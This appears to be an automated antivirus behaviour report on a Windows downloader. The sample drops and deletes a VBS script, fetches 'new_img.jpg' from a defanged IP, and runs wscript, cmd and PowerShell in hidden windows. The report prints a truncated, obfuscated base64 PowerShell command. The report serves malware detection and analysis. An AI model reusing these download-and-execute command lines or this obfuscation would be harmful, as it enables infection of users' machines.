Technical Information
Malicious functions
Downloads and executes files.
Modifies file system
Creates the following files
- %TEMP%\ixp000.tmp\6734cd13b2406.vbs
Deletes the following files
- %TEMP%\ixp000.tmp\6734cd13b2406.vbs
Network activity
Connects to
- '10#.#0.102.62':80
TCP
HTTP GET requests
- http://10#.#0.102.62/new_img.jpg
Miscellaneous
Creates and executes the following
- '<SYSTEM32>\wscript.exe' "%TEMP%\IXP000.TMP\6734cd13b2406.vbs"
Executes the following
- '<SYSTEM32>\cmd.exe' /c 6734cd13b2406.vbs
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "$codigo = 'WwBO$GU$d$$u$FM$ZQBy$HY$aQBj$GU$U$Bv$Gk$bgB0$E0$YQBu$GE$ZwBl$HI$XQ$6$Do$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$$g$D0$I$Bb$E4$ZQB0$C4$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$BU$...
- '<SYSTEM32>\cmd.exe' /c 6734cd13b2406.vbs' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "$codigo = 'WwBO$GU$d$$u$FM$ZQBy$HY$aQBj$GU$U$Bv$Gk$bgB0$E0$YQBu$GE$ZwBl$HI$XQ$6$Do$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$$g$D0$I$Bb$E4$ZQB0$C4$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$BU$...' (with hidden window)
